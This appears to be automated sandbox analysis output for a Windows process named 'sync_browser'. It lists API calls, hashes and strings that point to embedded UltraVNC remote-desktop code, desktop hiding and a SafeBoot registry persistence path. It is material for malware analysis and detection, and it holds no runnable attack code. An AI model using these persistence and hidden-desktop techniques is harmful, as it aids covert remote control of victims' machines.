• API String ID: 3826087893-1161645139
• Opcode ID: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
• Instruction ID: 905779685c5155a6efbbfaad6fb753fe44f92df2b6a9c9de3ddd871de1c0ad90
• Opcode Fuzzy Hash: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
• Instruction Fuzzy Hash: 77B1D632A08A4585F754AF39D8603BD77A1EB84F68F544136EE1D8B6CDCE78D401C761
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: EnumDisplayDevicesA$USER32
                                                                      • API String ID: 145871493-2970514552
                                                                      • Opcode ID: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
                                                                      • Instruction ID: ccdff83bd81f5787889ad04877836b2b568e8db9b686fd79b831802ca0dd6b1f
                                                                      • Opcode Fuzzy Hash: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
                                                                      • Instruction Fuzzy Hash: E831C931608B4A85E671EB25F4643AAA3A0FB86F94F944136EE9D83794DF3CD801C711
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: EnumDisplayDevicesA$USER32
                                                                      • API String ID: 145871493-2970514552
                                                                      • Opcode ID: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                                      • Instruction ID: 057a18ba72ed369a9acf892488f1844176ed4e0d0fc733b90ca434a3c8759b4e
                                                                      • Opcode Fuzzy Hash: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                                      • Instruction Fuzzy Hash: 39319731608B8A85E771EB25F4647A9A3A0FB99F94F940236EE9D83798DF3CD401C711
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: EnumDisplayDevicesA$USER32
                                                                      • API String ID: 145871493-2970514552
                                                                      • Opcode ID: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                                      • Instruction ID: 07112a23c606112a00d77eb7a9ec19050dc34067e1f5422defd09be8e3c0fcff
                                                                      • Opcode Fuzzy Hash: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                                      • Instruction Fuzzy Hash: 8721A732B08B4941E760EF25F464766A3A4FB85B94F95013AEA5D83784DF3CD4018751
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion$SubVersionNumber
                                                                      • API String ID: 3677997916-1834015684
                                                                      • Opcode ID: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
                                                                      • Instruction ID: b990cc71c9d2e3e55d649303a5022bb90d02bb614dff0b742c2a43103033b966
                                                                      • Opcode Fuzzy Hash: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
                                                                      • Instruction Fuzzy Hash: 2021A971A18B8681FB60EB20F46436AB364FF54F58F801136E64D47698EF3CD045C715
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressCreateFreeInfoInitializeInstanceLoadParametersProcSystem
                                                                      • String ID: HideDesktop.cpp : Restorewallpaper %i$HideDesktop.cpp : Restorewallpaper %i %i$shell32.dll
                                                                      • API String ID: 3848869850-2975526927
                                                                      • Opcode ID: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
                                                                      • Instruction ID: 447b8c5fde20799880c5aef7f3b882c626487b2b5239e4282f6ba900436c2893
                                                                      • Opcode Fuzzy Hash: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
                                                                      • Instruction Fuzzy Hash: 4511F560A0954B92FA60BB24B8347B5A351AF90B44FC04437E50DD66A9DE3CA61AC773
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Installed$System\WPA\MediaCenter
                                                                      • API String ID: 3677997916-3461404619
                                                                      • Opcode ID: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
                                                                      • Instruction ID: 80e105d74657c904cc7bdcd1d529dfd42b902ef35a75e1ec027023f927f07438
                                                                      • Opcode Fuzzy Hash: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
                                                                      • Instruction Fuzzy Hash: BA019B71A28B8582EB509F21F45476AF764FB84B94F801132FA8E46B58EF3CD544CF11
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfileWrite$SectionStringwsprintf
                                                                      • String ID: Permissions$isWritable
                                                                      • API String ID: 4007284473-46173998
                                                                      • Opcode ID: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
                                                                      • Instruction ID: 14b87063af13bf9e32cd66b2675dfdff9c491660c94aecde1c4b3df35d97b694
                                                                      • Opcode Fuzzy Hash: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
                                                                      • Instruction Fuzzy Hash: BC017165A08B4B91EF10AB15F4612B5B321FF85F98FC02033D90D86258EE3CE145CB61
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Delete_errno_invalid_parameter_noinfo_snprintf
                                                                      • String ID: Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$uvnc_service
                                                                      • API String ID: 1597899911-1199838351
                                                                      • Opcode ID: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
                                                                      • Instruction ID: d4409f452a14a82113f39637805db7f5818d017300f1a5b1d7119030dcd26cdb
                                                                      • Opcode Fuzzy Hash: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
                                                                      • Instruction Fuzzy Hash: 3EF09065A18B4A91EB10A724F4713BAA360FB44B48FC01237E64D837ACDF3CD105CB65
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      • API ID: _amsg_exit_errno_getptd_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 1050512615-0
                                                                      • API ID: ByteCharMultiWide$StringTypefreemalloc
                                                                      • String ID:
                                                                      • API String ID: 307345228-0
                                                                      APIs
                                                                      • DecodePointer.KERNEL32(?,?,00000000,00007FF7E5127B9D,?,?,?,?,00007FF7E51279F3), ref: 00007FF7E5127AB1
                                                                      • DecodePointer.KERNEL32(?,?,00000000,00007FF7E5127B9D,?,?,?,?,00007FF7E51279F3), ref: 00007FF7E5127AC1
                                                                        • Part of subcall function 00007FF7E5133480: _errno.LIBCMT ref: 00007FF7E5133489
                                                                        • Part of subcall function 00007FF7E5133480: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E5133494
                                                                      • EncodePointer.KERNEL32(?,?,00000000,00007FF7E5127B9D,?,?,?,?,00007FF7E51279F3), ref: 00007FF7E5127B3F
                                                                        • Part of subcall function 00007FF7E5133370: realloc.LIBCMT ref: 00007FF7E513339B
                                                                        • Part of subcall function 00007FF7E5133370: Sleep.KERNEL32(?,?,00000000,00007FF7E5127B2F,?,?,00000000,00007FF7E5127B9D,?,?,?,?,00007FF7E51279F3), ref: 00007FF7E51333B7
                                                                      • EncodePointer.KERNEL32(?,?,00000000,00007FF7E5127B9D,?,?,?,?,00007FF7E51279F3), ref: 00007FF7E5127B4F
                                                                      • EncodePointer.KERNEL32(?,?,00000000,00007FF7E5127B9D,?,?,?,?,00007FF7E51279F3), ref: 00007FF7E5127B5C
                                                                      • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                                      • String ID:
                                                                      • API String ID: 1909145217-0
                                                                      • API ID: CriticalDeleteSection$FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3328731263-0
                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                      • String ID:
                                                                      • API String ID: 1445889803-0
                                                                      • API ID: Event$CriticalInitializeSection
                                                                      • String ID:
                                                                      • API String ID: 4164307405-0
                                                                      • API ID: __doserrno_errno
                                                                      • String ID:
                                                                      • API String ID: 921712934-0
                                                                      • API ID: gethostbynamesprintf
                                                                      • String ID: %d.$IP address unavailable
                                                                      • API String ID: 4032199589-2983120142
                                                                      APIs
                                                                      • LoadCursorA.USER32 ref: 00007FF7E50A0925
                                                                        • Part of subcall function 00007FF7E509D930: InitializeCriticalSection.KERNEL32 ref: 00007FF7E509D95E
                                                                        • Part of subcall function 00007FF7E509D930: InitializeCriticalSection.KERNEL32 ref: 00007FF7E509D9EB
                                                                        • Part of subcall function 00007FF7E509D930: LoadLibraryA.KERNEL32 ref: 00007FF7E509DA0D
                                                                        • Part of subcall function 00007FF7E509D930: GetProcAddress.KERNEL32 ref: 00007FF7E509DA30
                                                                        • Part of subcall function 00007FF7E509D930: LoadLibraryA.KERNEL32 ref: 00007FF7E509DA51
                                                                        • Part of subcall function 00007FF7E509D930: GetProcAddress.KERNEL32 ref: 00007FF7E509DA6D
                                                                      • API ID: Load$AddressCriticalInitializeLibraryProcSection$Cursormalloc
                                                                      • String ID: vncDesktopSW.cpp : SWinit $vncdesktop.cpp : failed to start hook thread$vncdesktop.cpp : initialising desktop handler
                                                                      • API String ID: 2513085289-3031267129
                                                                      • Opcode ID: e487d388fed18aea2260250da6f24d23774b770b27bbd1d7d67b117f7b2f2a02
                                                                      • Instruction ID: 2a52a824845e924255e0fedfcf6ca7f857c8cb63e6eaa449e84aad98eb476f06
                                                                      • Opcode Fuzzy Hash: e487d388fed18aea2260250da6f24d23774b770b27bbd1d7d67b117f7b2f2a02
                                                                      • Instruction Fuzzy Hash: 5F215131604BC992F618AB60E5102E9E364FB44F50F944536D75D97799DF3CE025C321
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DesktopInputOpen
                                                                      • String ID: Default
                                                                      • API String ID: 601053899-753088835
                                                                      • Opcode ID: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                                      • Instruction ID: ebb162eedd47248bfa3e60ad8c825259033490e74fbd68b4613bf9f213e65ff5
                                                                      • Opcode Fuzzy Hash: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                                      • Instruction Fuzzy Hash: 49216239A1868A82E721EB15B4657BAA390FB89B44FC40036DA8D83658DF3CD114CB11
                                                                      APIs
                                                                      Strings
                                                                      • HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x), xrefs: 00007FF7E507A89F
                                                                      • HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x, xrefs: 00007FF7E507A8B0
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorInfoLastParametersSystem
                                                                      • String ID: HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x
                                                                      • API String ID: 2777246624-1049114938
                                                                      • Opcode ID: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
                                                                      • Instruction ID: 018b6ecf818567f8a93d5000dfd11f926de64163ce3edbb42d11fe59f145a592
                                                                      • Opcode Fuzzy Hash: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
                                                                      • Instruction Fuzzy Hash: 1E218631A0868A86E714EF21F410375B7A0FB44B48F840136EA4E97658DF3CE555C711
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID: fake %d down$fake %d up
                                                                      • API String ID: 4278518827-2496597273
                                                                      • Opcode ID: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                                      • Instruction ID: 64e49cecba077364dc699300114d6723ae55e9533699c237e0f61b9400f40eb2
                                                                      • Opcode Fuzzy Hash: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                                      • Instruction Fuzzy Hash: ED01E522F0928582E724A736A06027DAB91AB84F04FD88436E54D83399DE3CD446C722
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$InfoLoadParametersSystem$AddressCloseFreeOpenProcQueryValue
                                                                      • String ID: HideDesktop.cpp : Killwallpaper %i$HideDesktop.cpp : Killwallpaper %i %i
                                                                      • API String ID: 542764273-2415377678
                                                                      • Opcode ID: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
                                                                      • Instruction ID: 5e7754c6483cf0a439051044e09976bfd319ecda04d8f72b69c647f7e4003d4c
                                                                      • Opcode Fuzzy Hash: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
                                                                      • Instruction Fuzzy Hash: EE015B7190858B96F610BB20F8207B5A360FF94B08FC04037E90D97569DE3CA21AC773
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProcessWindow$CurrentFindThread
                                                                      • String ID: WinVNC Tray Icon
                                                                      • API String ID: 1332243453-1071638575
                                                                      • Opcode ID: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                                      • Instruction ID: f3fbf92c9e6d1b592a5dee656355154c38aa0a2993d3065450ef2e1e78b4d9b6
                                                                      • Opcode Fuzzy Hash: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                                      • Instruction Fuzzy Hash: 6AF03631A1C74582DF945B66B451579A250FF88FC4FC42037EA5E86758EF3CD485C711
                                                                      APIs
                                                                      • malloc.LIBCMT ref: 00007FF7E5092328
                                                                        • Part of subcall function 00007FF7E5128C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7E5128C64
                                                                        • Part of subcall function 00007FF7E5128C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7E513329C,?,?,?,00007FF7E5137749,?,?,?,00007FF7E51377F3), ref: 00007FF7E5128C89
                                                                        • Part of subcall function 00007FF7E5128C34: _callnewh.LIBCMT ref: 00007FF7E5128CA2
                                                                        • Part of subcall function 00007FF7E5128C34: _errno.LIBCMT ref: 00007FF7E5128CAD
                                                                        • Part of subcall function 00007FF7E5128C34: _errno.LIBCMT ref: 00007FF7E5128CB8
                                                                      • free.LIBCMT ref: 00007FF7E5092564
                                                                      • free.LIBCMT ref: 00007FF7E5092617
                                                                        • Part of subcall function 00007FF7E5128BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7E512748C), ref: 00007FF7E5128C0A
                                                                        • Part of subcall function 00007FF7E5128BF4: _errno.LIBCMT ref: 00007FF7E5128C14
                                                                        • Part of subcall function 00007FF7E5128BF4: GetLastError.KERNEL32(?,?,?,00007FF7E512748C), ref: 00007FF7E5128C1C
                                                                      Strings
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF7E509230B
                                                                      Memory Dump Source
